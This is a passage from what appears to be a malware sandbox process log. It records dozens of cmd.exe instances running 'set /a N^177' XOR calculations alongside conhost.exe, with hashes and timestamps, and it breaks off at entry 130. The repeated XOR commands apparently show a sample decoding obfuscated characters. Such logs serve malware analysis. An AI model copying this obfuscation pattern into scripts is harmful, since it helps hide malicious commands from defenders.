                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "137^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:70
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:71
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:72
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:73
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:74
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:75
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:76
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:77
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:78
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:79
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:80
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:81
Start time:10:51:36
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:82
Start time:10:51:37
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

                                                                                                                                                                                  Target ID:83
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:84
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:85
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:86
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:87
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:88
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:89
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:90
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:91
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:92
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:93
                                                                                                                                                                                  Start time:10:51:37
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:94
Start time:10:51:37
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "157^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:95
Start time:10:51:37
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:96
Start time:10:51:37
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:97
Start time:10:51:37
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:98
Start time:10:51:37
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "193^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:99
Start time:10:51:37
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:100
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:101
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:102
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:103
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:104
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "157^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:105
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:106
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:107
Start time:10:51:38
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:108
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:109
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:110
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:111
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:112
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "133^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:113
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:114
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:115
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:116
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:117
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:118
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "216^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:119
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:120
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:121
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:122
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:123
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:124
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "201^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:125
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:126
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "137^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:127
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:128
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "129^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:129
Start time:10:51:39
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:130
Start time:10:52:13
Start date:08/10/2024
